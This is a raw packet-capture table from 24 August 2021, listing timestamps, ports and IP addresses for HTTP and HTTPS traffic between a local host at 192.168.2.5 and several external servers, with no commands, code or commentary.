Aug 24, 2021 08:49:20.205614090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205630064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205648899 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205665112 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205679893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205682993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205686092 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.205697060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205719948 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.205735922 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.207461119 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.207663059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207683086 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207701921 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207720995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207732916 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207745075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.207746029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207763910 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207783937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207799911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207814932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207830906 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207833052 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.207837105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.207847118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207869053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207885981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.207947016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211126089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211167097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211184025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211205006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211221933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211237907 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211253881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211270094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211287022 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211301088 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211302996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211321115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211344004 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211353064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211369038 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211385012 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211397886 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211400986 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211402893 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211420059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211436987 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211452961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211462021 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211463928 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211469889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211487055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211502075 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211513996 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211518049 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211519003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211534977 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211554050 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211570978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211586952 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211600065 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211601973 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211604118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211620092 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211636066 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211652040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211666107 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211668015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211668015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211688042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211704969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211719036 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211721897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211724043 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211739063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211750031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211755037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211771965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211786985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211803913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211823940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211834908 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211839914 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211841106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211857080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211873055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211889029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211899996 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211901903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211905003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211921930 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211937904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211956978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.211958885 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.211962938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.212044954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212086916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.212090015 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.212151051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212167978 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212236881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212254047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212270021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212285995 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212294102 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.212297916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.212336063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212362051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212379932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212394953 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212407112 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.212409019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.212429047 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212443113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:20.212493896 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.212498903 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.216743946 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.544481993 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:20.832333088 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:20.947269917 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:20.947417974 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:20.951941013 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.969026089 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.969363928 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.971307993 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.996375084 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996407032 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996428967 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996452093 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996483088 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996488094 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996498108 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.996505976 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996522903 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996546984 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996567011 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996589899 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996617079 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.996678114 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.996689081 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.996897936 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996937037 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996958971 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.996989012 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.997014999 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.997112989 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.997174025 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.997236967 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.997795105 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.997822046 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.997840881 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.997860909 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.998724937 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.998739004 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.998755932 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.998790979 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.998815060 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.998961926 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.999326944 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.999664068 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.999689102 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.999710083 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.999730110 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:20.999767065 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:20.999852896 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.000312090 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.000339031 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.000931025 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.012689114 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.012717962 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.012736082 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.012752056 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.013011932 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.013031006 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.013055086 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.013073921 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.013129950 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.013200998 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.013860941 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.013993025 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.014010906 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.014027119 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.014044046 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.014084101 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.014132023 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.014877081 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.014899969 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.014915943 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.015001059 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.015202045 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.015664101 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.015690088 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.015707970 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.015723944 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.015799999 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.015852928 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.016396046 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.016417027 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.016431093 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.016475916 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.016752005 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.016866922 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.017189026 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.017208099 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.017224073 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.017261028 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.017318010 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.018002033 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.018026114 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.018042088 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.018058062 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.018098116 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.018153906 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.018605947 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.018629074 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.018646955 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.018662930 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.019232035 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.019414902 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.019435883 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.019452095 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.019471884 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.019532919 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.020241022 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.020272017 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.020297050 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.020320892 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.020395994 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.020415068 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.021039963 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.021070004 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.021090031 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.021110058 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.021152020 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.021200895 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.029290915 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.029326916 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.029347897 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.029367924 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.029386044 CEST	80	49717	172.67.216.236	192.168.2.5
Aug 24, 2021 08:49:21.029441118 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.029521942 CEST	49717	80	192.168.2.5	172.67.216.236
Aug 24, 2021 08:49:21.052360058 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:21.175312996 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.175344944 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.175368071 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.175391912 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.175409079 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.175431013 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.175602913 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:21.175627947 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:21.643394947 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:21.757868052 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.758019924 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:21.820909023 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:21.935735941 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.935769081 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.935789108 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.935806036 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.935822010 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:21.935822964 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.935841084 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.935858011 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.935878038 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.935878992 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:21.935895920 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.935911894 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:21.936062098 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:22.050146103 CEST	443	49716	74.114.154.18	192.168.2.5
Aug 24, 2021 08:49:22.050204992 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:22.053694010 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:22.053858042 CEST	49716	443	192.168.2.5	74.114.154.18
Aug 24, 2021 08:49:22.238502026 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.259260893 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.259383917 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.260518074 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.282620907 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.374872923 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.374952078 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.380033016 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.400314093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.400402069 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.400501013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.400518894 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.400538921 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.400619984 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.400650024 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.400899887 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.400922060 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.400960922 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.400980949 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.400994062 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.401010990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.401038885 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.401067019 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.401083946 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421052933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421139002 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421143055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421159983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421175957 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421220064 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421232939 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421281099 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421298981 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421314955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421336889 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421366930 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421387911 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421432018 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421459913 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421551943 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421567917 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421583891 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421598911 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421628952 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421674013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421691895 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421709061 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421726942 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421735048 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421740055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421752930 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421763897 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421780109 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.421787024 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421834946 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.421844959 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:22.441716909 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:22.441741943 CEST	80	49718	188.34.200.103	192.168.2.5
